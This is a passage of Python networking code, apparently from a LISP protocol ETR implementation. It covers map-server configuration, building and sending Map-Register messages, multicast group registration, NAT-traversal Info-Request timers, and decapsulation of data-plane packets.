#enddef
#
# lisp_etr_show_command
#
# Show ETR configured map-servers and database-mappings.
#
def lisp_etr_show_command(clause):
#
# Show local found RLOCs.
#
output = lispconfig.lisp_show_myrlocs("")
#
# Show decapsulation stats.
#
output = lispconfig.lisp_show_decap_stats(output, "ETR")
#
# Show configured map-servers.
#
dns_suffix = lisp.lisp_decent_dns_suffix
if (dns_suffix == None):
dns_suffix = ":"
else:
dns_suffix = " (dns-suffix '{}'):".format(dns_suffix)
#endif
hover = "{} configured map-servers".format(len(lisp.lisp_map_servers_list))
title = "LISP-ETR Configured Map-Servers{}".format(dns_suffix)
title = lisp.lisp_span(title, hover)
hover = ("P = proxy-reply requested, M = merge-registrations " + \
"requested, N = Map-Notify requested")
reg_title = lisp.lisp_span("Registration<br>flags", hover)
output += lispconfig.lisp_table_header(title, "Address", "Auth-Type",
"xTR-ID", "Site-ID", reg_title, "Map-Registers<br>Sent",
"Map-Notifies<br>Received")
for ms in lisp.lisp_map_servers_list.values():
ms.resolve_dns_name()
ms_name = "" if ms.ms_name == "all" else ms.ms_name + "<br>"
addr_str = ms_name + ms.map_server.print_address_no_iid()
if (ms.dns_name): addr_str += "<br>" + ms.dns_name
xtr_id = "0x" + lisp.lisp_hex_string(ms.xtr_id)
flags = "{}-{}-{}-{}".format("P" if ms.proxy_reply else "p",
"M" if ms.merge_registrations else "m",
"N" if ms.want_map_notify else "n",
"R" if ms.refresh_registrations else "r")
registers_sent = ms.map_registers_sent + \
ms.map_registers_multicast_sent
output += lispconfig.lisp_table_row(addr_str,
"sha1" if (ms.alg_id == lisp.LISP_SHA_1_96_ALG_ID) else "sha2",
xtr_id, ms.site_id, flags, registers_sent,
ms.map_notifies_received)
#endfor
output += lispconfig.lisp_table_footer()
#
# Show database-mappings configured.
#
output = lispconfig.lisp_show_db_list("ETR", output)
#
# Show ELP configuration, if it exists.
#
if (len(lisp.lisp_elp_list) != 0):
output = lispconfig.lisp_show_elp_list(output)
#endif
#
# Show RLE configuration, if it exists.
#
if (len(lisp.lisp_rle_list) != 0):
output = lispconfig.lisp_show_rle_list(output)
#endif
#
# Show JSON configuration, if it exists.
#
if (len(lisp.lisp_json_list) != 0):
output = lispconfig.lisp_show_json_list(output)
#endif
#
# Show group-mappings, if they exist.
#
if (len(lisp.lisp_group_mapping_list) != 0):
title = "Configured Group Mappings:"
output += lispconfig.lisp_table_header(title, "Name", "Group Prefix",
"Sources", "Use MS")
for gm in lisp.lisp_group_mapping_list.values():
sources = ""
for s in gm.sources: sources += s + ", "
if (sources == ""):
sources = "*"
else:
sources = sources[0:-2]
#endif
output += lispconfig.lisp_table_row(gm.group_name,
gm.group_prefix.print_prefix(), sources, gm.use_ms_name)
#endfor
output += lispconfig.lisp_table_footer()
#endif
return(output)
#enddef
#
# lisp_etr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_etr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ETR"))
#enddef
#
# lisp_map_server_command
#
# Store configured map-servers.
#
def lisp_map_server_command(kv_pairs):
global lisp_trigger_register_timer
global lisp_etr_info_timer
addresses = []
dns_names = []
key_id = 0
alg_id = 0
password = ""
proxy_reply = False
merge = False
refresh = False
want = False
site_id = 0
ms_name = None
ekey_id = 0
ekey = None
for kw in kv_pairs.keys():
value = kv_pairs[kw]
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for i in range(len(value)):
addresses.append(value[i])
#endfor
#endif
if (kw == "dns-name"):
for i in range(len(value)):
dns_names.append(value[i])
#endfor
#endif
if (kw == "authentication-type"):
alg_id = lisp.LISP_SHA_1_96_ALG_ID if (value == "sha1") else \
lisp.LISP_SHA_256_128_ALG_ID if (value == "sha2") else ""
#endif
if (kw == "authentication-key"):
if (alg_id == 0): alg_id = lisp.LISP_SHA_256_128_ALG_ID
auth_key = lisp.lisp_parse_auth_key(value)
key_id = auth_key.keys()[0]
password = auth_key[key_id]
#endif
if (kw == "proxy-reply"):
proxy_reply = True if value == "yes" else False
#endif
if (kw == "merge-registrations"):
merge = True if value == "yes" else False
#endif
if (kw == "refresh-registrations"):
refresh = True if value == "yes" else False
#endif
if (kw == "want-map-notify"):
want = True if value == "yes" else False
#endif
if (kw == "site-id"):
site_id = int(value)
#endif
if (kw == "encryption-key"):
ekey = lisp.lisp_parse_auth_key(value)
ekey_id = ekey.keys()[0]
ekey = ekey[ekey_id]
#Endif
#endfor
#
# Store internal data structure.
#
ms = None
for addr_str in addresses:
if (addr_str == ""): continue
ms = lisp.lisp_ms(addr_str, None, ms_name, alg_id, key_id, password,
proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
#endfor
for name in dns_names:
if (name == ""): continue
ms = lisp.lisp_ms(None, name, ms_name, alg_id, key_id, password,
proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
#endfor
#
    # Trigger an Info-Request if we are doing NAT-traversal and this is the
    # first Map-Server.
#
first_ms = (len(lisp.lisp_map_servers_list) == 1)
if (first_ms):
ms = lisp.lisp_map_servers_list.values()[0]
lisp_etr_info_timer = threading.Timer(2, lisp_etr_process_info_timer,
[ms.map_server])
lisp_etr_info_timer.start()
else:
#
# Trigger Map-Register to newly configured Map-Server.
#
        # Do not trigger Map-Register if NAT-traversal is configured. We may not
        # have the global RLOC yet from Info-Replies. When the Info-Reply comes
        # in, we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (ms and len(lisp.lisp_db_list) > 0):
lisp_build_map_register(lisp_send_sockets, None, None, ms, False)
#endif
#endif
#
# Handle case where "lisp database-mapping" comes before "lisp map-server"
# in configuration file. We have to start periodic timer.
#
if (len(lisp.lisp_db_list) > 0):
if (lisp_trigger_register_timer != None and
lisp_trigger_register_timer.is_alive()): return
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
return
#enddef
#
# lisp_group_mapping_command
#
# Process the "lisp group-mapping" command clause.
#
def lisp_group_mapping_command(kv_pairs):
sources = []
group_prefix = None
rle_address = None
ms_name = "all"
for kw in kv_pairs.keys():
value = kv_pairs[kw]
if (kw == "group-name"):
group_name = value
#endif
if (kw == "group-prefix"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.store_prefix(value)
#endif
if (kw == "instance-id"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.instance_id = int(value)
#endif
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for source in value:
if (source != ""): sources.append(source)
#endfor
#endif
if (kw == "rle-address"):
if (rle_address == None):
rle_address = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
rle_address.store_address(value)
#endif
#endfor
gm = lisp.lisp_group_mapping(group_name, ms_name, group_prefix, sources,
rle_address)
gm.add_group()
return
#enddef
#
# lisp_build_map_register_records
#
# Build EID and RLOC records to be inserted in a Map-Register message.
#
def lisp_build_map_register_records(quiet, db, eid, group, ttl):
#
# Don't include RTR-list if there is no NAT in the path but nat-traversal
# is configured and NAT in path is tested. When there is a NAT, include
# all RTRs if lisp_register_all_rtrs is configured. Otherwise, if the
# array element is None, then the RTR is down and should be excluded in
# the list to register.
#
rtr_list = {}
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
for rtr_str in lisp.lisp_rtr_list:
rtr = lisp.lisp_rtr_list[rtr_str]
if (lisp.lisp_register_all_rtrs == False and rtr == None):
lisp.lprint(" Exclude unreachable RTR {}".format( \
lisp.red(rtr_str, False)))
continue
#endif
if (rtr == None): continue
rtr_list[rtr_str] = rtr
#endif
break
#endfor
count = 0
eid_records = ""
for iid in [eid.instance_id] + eid.iid_list:
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = len(db.rloc_set) + len(rtr_list)
eid_record.authoritative = True
eid_record.record_ttl = ttl
eid_record.eid.copy_address(eid)
eid_record.eid.instance_id = iid
eid_record.eid.iid_list = []
eid_record.group.copy_address(group)
eid_records += eid_record.encode()
if (not quiet):
prefix_str = lisp.lisp_print_eid_tuple(eid, group)
decent_index = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid)
decent_index = lisp.bold(str(decent_index), False)
decent_index = ", decent-index {}".format(decent_index)
#endif
lisp.lprint(" EID-prefix {} for ms-name '{}'{}".format( \
lisp.green(prefix_str, False), db.use_ms_name, decent_index))
eid_record.print_record(" ", False)
#endif
for rloc_entry in db.rloc_set:
rloc_record = lisp.lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = rloc_entry.rloc.is_local()
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" ")
#endfor
#
        # If we are doing NAT-traversal, include a set of RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in rtr_list.values():
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" RTR ")
#endfor
#
# Return to caller number of EID records written to returned buffer.
#
count += 1
#endfor
return(eid_records, count)
#enddef
#
# lisp_build_map_register
#
# From each configured "database-mapping" command, register mappings to
# configured map-servers.
#
def lisp_build_map_register(lisp_sockets, ttl, eid_only, ms_only, refresh):
#
# No database-mapping entries.
#
if (eid_only != None):
db_list_len = 1
else:
db_list_len = lisp.lisp_db_list_length()
if (db_list_len == 0): return
#endif
lisp.lprint("Build Map-Register for {} database-mapping entries". \
format(db_list_len))
#
# Set boolean if "decentralized-pull-xtr-[modulus,dns-suffix]" configured.
#
decent = lisp.lisp_decent_pull_xtr_configured()
#
# Go quiet with debug output when there are a lot of EID-records.
#
quiet = (db_list_len > 12)
ms_list = {}
if (decent):
#
# If "decentralized-pull-xtr-[modulus,dns-suffix]" is configured,
        # decide which map-server this EID belongs to (and is registered with).
#
for db in lisp.lisp_db_list:
eid = db.eid if db.group.is_null() else db.group
dns_name = lisp.lisp_get_decent_dns_name(eid)
ms_list[dns_name] = []
#endfor
else:
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count.
#
for ms in lisp.lisp_map_servers_list.values():
if (ms_only != None and ms != ms_only): continue
ms_list[ms.ms_name] = []
#endfor
#endif
#
    # Create data structure instances to build Map-Register message.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
if (ttl == None): ttl = lisp.LISP_REGISTER_TTL
#
    # Traverse the database-mapping associative array.
#
for db in lisp.lisp_db_list:
if (decent):
ms_dns_name = lisp.lisp_get_decent_dns_name(db.eid)
else:
ms_dns_name = db.use_ms_name
#endif
#
# Is db entry associated with a map-server name that is not
# configured?
#
if (ms_list.has_key(ms_dns_name) == False): continue
msl = ms_list[ms_dns_name]
if (msl == []):
msl = ["", 0]
ms_list[ms_dns_name].append(msl)
else:
msl = ms_list[ms_dns_name][-1]
#endif
#
# If dynamic-EIDs are discovered, add each of them to EID-records,
# unless, we are doing a trigger in which case a single dynamic-EID
# is built into an EID-record.
#
# Otherwise, add static EID-prefixes into EID-records, unless a single
# one is triggered.
#
eid_records = ""
if (db.dynamic_eid_configured()):
for dyn_eid in db.dynamic_eids.values():
eid = dyn_eid.dynamic_eid
if (eid_only == None or eid_only.is_exact_match(eid)):
records, count = lisp_build_map_register_records(quiet, db,
eid, db.group, ttl)
eid_records += records
msl[1] += count
#endif
#endfor
else:
if (eid_only == None):
eid_records, count = lisp_build_map_register_records(quiet, db,
db.eid, db.group, ttl)
msl[1] += count
#endif
#endif
#
# Add EID-records to correct map-server name set.
#
msl[0] += eid_records
if (msl[1] == 20 or len(msl[0]) > 1100):
msl = ["", 0]
ms_list[ms_dns_name].append(msl)
#endif
#endfor
#
# Send Map-Register to each configured map-server.
#
for ms in lisp.lisp_map_servers_list.values():
if (ms_only != None and ms != ms_only): continue
ms_dns_name = ms.dns_name if decent else ms.ms_name
if (ms_list.has_key(ms_dns_name) == False): continue
for msl in ms_list[ms_dns_name]:
#
# Build map-server specific fields.
#
map_register.record_count = msl[1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.key_id = ms.key_id
map_register.proxy_reply_requested = ms.proxy_reply
map_register.merge_register_requested = ms.merge_registrations
map_register.map_notify_requested = ms.want_map_notify
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
if (ms.refresh_registrations):
map_register.map_register_refresh = refresh
#endif
if (ms.ekey != None): map_register.encryption_key_id = ms.ekey_id
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id("")
eid_records = msl[0]
packet = packet + eid_records + trailer
ms.map_registers_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
time.sleep(.001)
#endfor
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Exit loop if we are triggering a Map-Register to a single
# Map-Server.
#
if (ms_only != None and ms == ms_only): break
#endfor
return
#enddef
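#
# Illustrative sketch (comments only, simplified): the per-map-server batching
# above starts a new Map-Register once a batch holds 20 EID-records or its
# encoded records exceed 1100 bytes. Stripped of the LISP encoding it is just:
#
#   batches = [["", 0]]                     # [records-buffer, record-count]
#   for records, count in encoded_entries:  # hypothetical pre-encoded records
#       batches[-1][0] += records
#       batches[-1][1] += count
#       if (batches[-1][1] == 20 or len(batches[-1][0]) > 1100):
#           batches.append(["", 0])
#   # one Map-Register is then sent per non-empty batch
#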
#
# lisp_etr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# than sending periodic Map-Registers, as well as less than the NAT timeout
# value, which is usually one minute.
#
def lisp_etr_process_info_timer(ms):
global lisp_etr_info_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_socket, lisp_ephem_socket, lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, ms, lisp.LISP_CTRL_PORT)
#
# Build Info-Request for RTRs so we can open up NAT state so RTRs
# can encapsulate to us when ETR is behind NAT.
#
allow_private = (os.getenv("LISP_RTR_BEHIND_NAT") == None)
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
if (rtr.is_private_address() and allow_private == False):
r = lisp.red(rtr.print_address_no_iid(), False)
lisp.lprint("Skip over RTR private address {}".format(r))
continue
#endif
lisp.lisp_build_info_requests(sockets, rtr, lisp.LISP_DATA_PORT)
#endfor
#
    # Restart periodic timer. For some reason only this timer has to be
    # canceled. Found while testing NAT-traversal on a rasp-pi in Jul 2015.
#
lisp_etr_info_timer.cancel()
lisp_etr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
return
#enddef
#
# lisp_process_register_timer
#
# Time to send a periodic Map-Register.
#
def lisp_process_register_timer(lisp_sockets):
global lisp_register_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build and send Map-Register.
#
lisp_build_map_register(lisp_sockets, None, None, None, True)
#
    # If we are doing L2-overlays, then register as a join of the
# broadcast MAC address.
#
if (lisp.lisp_l2_overlay):
entry = [ None, "ffff-ffff-ffff", True ]
lisp_send_multicast_map_register(lisp_sockets, [entry])
#endif
#
# Restart periodic timer.
#
if (lisp_register_timer): lisp_register_timer.cancel()
lisp_register_timer = threading.Timer(LISP_MAP_REGISTER_INTERVAL,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
return
#enddef
#
# lisp_send_multicast_map_register
#
# Build a Map-Register message with a Multicast Info Type LCAF as an EID-record
# for each entry in the 'entries' array. And build an RLOC-record as an RLE
# describing this ETR as the RLOC to be used for replication.
#
# The entries is an array of (source, group, joinleave) tuples.
#
def lisp_send_multicast_map_register(lisp_sockets, entries):
length = len(entries)
if (length == 0): return
afi = None
if (entries[0][1].find(":") != -1): afi = lisp.LISP_AFI_IPV6
if (entries[0][1].find(".") != -1): afi = lisp.LISP_AFI_IPV4
if (entries[0][1].find("-") != -1): afi = lisp.LISP_AFI_MAC
if (afi == None):
lisp.lprint("lisp_send_multicast_map_register() invalid group address")
return
#endif
#
# Find all (*,G) entries in entries array and replace with (S,G) entries
# from lisp_group_mapping_list.
#
g_entries = []
for source, group, joinleave in entries:
if (source != None): continue
g_entries.append([group, joinleave])
#endfor
decent = lisp.lisp_decent_pull_xtr_configured()
ms_list = {}
entries = []
for group, joinleave in g_entries:
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None):
lisp.lprint("No group-mapping for {}, could be underlay group". \
format(group))
continue
#endif
lisp.lprint("Use group-mapping '{}' {} for group {}".format( \
ms_gm.group_name, ms_gm.group_prefix.print_prefix(), group))
iid = ms_gm.group_prefix.instance_id
ms_name = ms_gm.use_ms_name
rle = ms_gm.rle_address
#
# To obtain the decent-index for a group address, use only the group
# address (and no source) as part of the hash, because an ITR does not
# know whether (*,G) or (S,G) is registered with the mapping system.
#
key = ms_name
if (decent):
key = lisp.lisp_get_decent_dns_name_from_str(iid, group)
ms_list[key] = ["", 0]
#endif
if (len(ms_gm.sources) == 0):
entries.append(["0.0.0.0", group, iid, key, rle, joinleave])
continue
#endif
for s in ms_gm.sources:
ms_list[key] = ["", 0]
entries.append([s, group, iid, key, rle, joinleave])
#endfor
#endfor
length = len(entries)
if (length == 0): return
lisp.lprint("Build Map-Register for {} multicast entries".format(length))
#
# Build RLE node for RLOC-record encoding. If behind a NAT, we need to
# insert a global address as the RLE node address. We will do that in
# the entries for loop.
#
rle_node = lisp.lisp_rle_node()
rle_node.level = 128
translated_rloc = lisp.lisp_get_any_translated_rloc()
rle = lisp.lisp_rle("")
rle.rle_nodes.append(rle_node)
#
# Set up each map-server name so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count. The ms_list
# is already setup for when pull-based decent is used.
#
if (decent == False):
for ms in lisp.lisp_map_servers_list.values():
ms_list[ms.ms_name] = ["", 0]
#endfor
#endif
rloc_name = None
if (lisp.lisp_nat_traversal): rloc_name = lisp.lisp_hostname
#
# Count number of RTRs reachable so we know allocation count.
#
rtr_count = 0
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
rtr_count += 1
#endfor
#
# Run through multicast entry array.
#
eid_records = ""
for source, group, iid, ms_dns_name, rle_addr, joinleave in entries:
#
# Is db entry associated with a map-server name that is not configured?
#
if (ms_list.has_key(ms_dns_name) == False): continue
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = 1 + rtr_count
eid_record.authoritative = True
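#
# A join registers the entry with the normal register TTL; a leave
# registers it with a TTL of 0 so the mapping system can remove it
# (this reading is based on the joinleave conditional below).
#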
eid_record.record_ttl = lisp.LISP_REGISTER_TTL if joinleave else 0
eid_record.eid = lisp.lisp_address(afi, source, 0, iid)
if (eid_record.eid.address == 0): eid_record.eid.mask_len = 0
eid_record.group = lisp.lisp_address(afi, group, 0, iid)
if (eid_record.group.is_mac_broadcast() and \
eid_record.eid.address == 0): eid_record.eid.mask_len = 0
decent_index = ""
ms_name = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid_record.group)
decent_index = lisp.bold(str(decent_index), False)
decent_index = "with decent-index {}".format(decent_index)
else:
decent_index = "for ms-name '{}'".format(ms_dns_name)
#endif
eid_str = lisp.green(eid_record.print_eid_tuple(), False)
lisp.lprint(" EID-prefix {} {}{}".format(eid_str, ms_name,
decent_index))
eid_records += eid_record.encode()
eid_record.print_record(" ", False)
ms_list[ms_dns_name][1] += 1
#
# Build our RLOC entry.
#
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc_name = rloc_name
#
# Decide on RLE address. Have NAT-traversal take precedence, otherwise
# use configured RLE in group-mapping. If one wasn't configured use
# lisp_myrlocs IPv4 address.
#
if (translated_rloc != None):
rle_node.address = translated_rloc
elif (rle_addr != None):
rle_node.address = rle_addr
else:
rle_node.address = rle_addr = lisp.lisp_myrlocs[0]
#endif
rloc_record.rle = rle
rloc_record.local_bit = True
rloc_record.reach_bit = True
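#
# A unicast priority of 255 means this RLOC must not be used for unicast
# forwarding (per RFC 6830); replication is driven by the RLE attached
# above.
#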
rloc_record.priority = 255
rloc_record.weight = 0
rloc_record.mpriority = 1
rloc_record.mweight = 100
eid_records += rloc_record.encode()
rloc_record.print_record(" ")
#
# If we are doing NAT-traversal, include a set of RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
rloc_record.print_record(" RTR ")
#endfor
#
# Add EID-records to correct map-server name set.
#
ms_list[ms_dns_name][0] += eid_records
#endfor
#
# Build map-server independent fields.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
map_register.proxy_reply_requested = True
map_register.map_notify_requested = False
map_register.merge_register_requested = True
#
# Send Map-Register to each configured map-server.
#
for ms in lisp.lisp_map_servers_list.values():
key = ms.dns_name if decent else ms.ms_name
#
# Get EID-records from correct map-server name set.
#
if (ms_list.has_key(key) == False): continue
#
# Build map-server specific fields.
#
map_register.record_count = ms_list[key][1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.key_id = ms.key_id
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id("")
packet = packet + eid_records + trailer
ms.map_registers_multicast_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Go build more EID-records.
#
time.sleep(.001)
#endfor
return
#enddef
#
# lisp_etr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulate it.
#
def lisp_etr_data_plane(parms, not_used, packet):
global lisp_ipc_listen_socket, lisp_send_sockets
device = parms[0]
lisp_raw_socket = parms[1]
#
# Jump over MAC header if packet received on interface. There is a 4-byte
# internal header on loopback interfaces and a 16-byte header on other
# interfaces.
#
if (lisp.lisp_is_macos() == False):
offset = 4 if device == "lo0" else 16
packet = packet[offset::]
#endif
#
# Check IGMP packet.
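# Byte 9 of the IPv4 header is the protocol field; protocol 2 is IGMP.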
#
protocol = struct.unpack("B", packet[9])[0]
if (protocol == 2):
entries = lisp.lisp_process_igmp_packet(packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 0)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
#
# First check if we are assembling IPv4 fragments. Do this only when
# not doing NAT-traversal. Otherwise, the kernel will do it when we
# receive the same packet on a raw socket (in lisp_etr_nat_data_plane()).
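# With a 20-byte IPv4 header and no options, bytes 20-21 are the UDP
# source port.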
#
sport = socket.ntohs(struct.unpack("H", packet[20:22])[0])
if (lisp.lisp_nat_traversal and sport == lisp.LISP_DATA_PORT): return
packet = lisp.lisp_reassemble(packet)
if (packet == None): return
packet = lisp.lisp_packet(packet)
status = packet.decode(True, lisp_ipc_listen_socket, lisp.lisp_decap_stats)
if (status == None): return
#
# Print some useful header fields.
#
packet.print_packet("Receive", True)
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
source = packet.inner_source.print_address_no_iid()
packet.strip_outer_headers()
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply. The inner LISP header begins at offset 20+16+28=64
# (outer-IPv4 + UDP-outer-LISP + inner-IPv4-UDP).
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet[36::]
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
ttl = struct.unpack("B", inner_ip[8])[0] - 1
#endif
source = packet.outer_source.print_address_no_iid()
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Strip outer headers and start inner header forwarding logic.
#
packet.strip_outer_headers()
f_or_b = lisp.bold("Forward", False)
#
# Process inner header (checksum and decrement ttl).
#
igmp = False
L2 = packet.inner_dest.is_mac()
if (L2):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
f_or_b = lisp.bold("Bridge", False)
elif (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
if (igmp):
entries = lisp.lisp_process_igmp_packet(packet.packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet (through NAT)")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
#
# We are going to forward or bridge the decapsulated packet.
#
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format(f_or_b, \
lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# If we are decapsulating a MAC frame, then use the L2 socket where
# the MAC header is already in packet.
#
if (L2):
packet.bridge_l2_packet(packet.inner_dest, db)
return
#endif
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header.
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket based on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_etr_nat_data_plane
#
# Packet came in on a destination ephemeral port from a source port of 4341.
# That is, an RTR encapsulated this packet, which is coming through a NAT device.
#
# The packet has the outer IP and UDP headers stripped so the first byte of
# this supplied data packet has the LISP data header on it.
#
def lisp_etr_nat_data_plane(lisp_raw_socket, packet, source):
global lisp_ipc_listen_socket, lisp_send_sockets
#
# Decode LISP header.
#
lisp_header = packet
packet = lisp.lisp_packet(packet[8::])
if (packet.lisp_header.decode(lisp_header) == False): return
#
# Store outer source RLOC address so if we are doing lisp-crypto across
# NAT-traversal, we can find the decryption key.
#
packet.outer_source = lisp.lisp_address(lisp.LISP_AFI_IPV4, source,
lisp.LISP_IPV4_HOST_MASK_LEN, 0)
status = packet.decode(False, lisp_ipc_listen_socket,
lisp.lisp_decap_stats)
if (status == None): return
#
# Special case to log packets that have no outer header but are considered
# decapsulated when coming through NATs. Since packets are sent from
# source port 4341, the kernel will strip outer header, so we don't have
# outer header context in lisp_packet().
#
if (lisp.lisp_flow_logging): packet.log_flow(False)
packet.print_packet("Kernel-decap", False)
lisp.dprint(packet.lisp_header.print_header(" "))
#
